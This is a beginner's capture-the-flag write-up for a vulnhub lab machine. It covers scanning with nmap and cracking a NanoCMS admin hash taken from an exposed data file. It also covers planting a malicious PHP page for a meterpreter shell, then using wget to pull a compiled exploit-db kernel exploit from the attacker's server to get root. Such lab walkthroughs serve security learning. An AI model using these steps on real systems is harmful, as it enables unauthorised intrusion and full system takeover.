In this article we will try to solve one more CTF challenge . We can download this machine from vulnhub . This machine is designed for beginners.
first step is to find the IP address of the targeted machine . For that we used the command : netdiscover -i wlan0
Next step is to check for open ports and for that we used the command : nmap -p- 192.168.43.201
We can see this machine has many open ports . but we decided to browse HTTP Service on port 80 so open the browser and type in the URL http://192.168.43.201:80 we can see that it is a website of a phake organization
So now we started to discover this website and we found a login a page when we clicked on Blog->Admin Login
So we tried to find different vulnerabilities but we failed to do so. then we also check source code but in source code there was no useful information that can be used to login .
So after thinking a lot we noticed a word NanoCMS , we searched on internet if this has some vulnerability or not and yes we found a vulnerability on a website.
So we decided to open this page as described in the website. So we visited the URL http://192.168.43.201/~andy/data/pagesdata.txt
So now its time to crack the hash . we go to the link : https://crackstation.net/ to crack the hash .
Now we have admin login credentials as :
username : admin
password : shannon
now we can use this credentials to login to main panel of the website.
Here we can see that admin can add a New Page so we visit to pages & Options to see information about other pages to check if we can add a .php file so that we can get a meterpreter session.But we didn't see any php file there but still we tried by adding a new page . Now we create a malicious php code as show in the image and copy that code and paste it into the content of the new page that we want to add.
Now we clicked on Add Page to add the page. Now logout and go to http://192.168.43.201/~andy/ to execute this malicious code but before that open meterpreter and set everything to get a session.
Now click on the page clickme.
Now we have meterpreter session as shown in the image now we type in shell to get a shell then by using python-one-liner we get a stable shell.
by using command uname -r we find that kernel version is old . so there are chances that there is exploit available for this version . So we searched on internet and found a exploit on website : https://www.exploit-db.com/exploits/9479
we downloaded this exploit in our Kali Linux machine and make its binary by using the command : gcc -m32 9479.c -o roothis now we transfer this binary to our targeted machine by using python SimpleHTTPServer to run the server we run the command : python -m SimpleHTTPServer
Now we switch to the targeted machine's shell to download this binary by using the command : wget http://192.168.43.9:8000/roothis
Now we set the permission to executable to execute this binary by using the command : chmod +x roothis now by using ./roothis we run the exploit and Booooooooooom! we are root now!! we run id command to check it.
And this completes our challenge!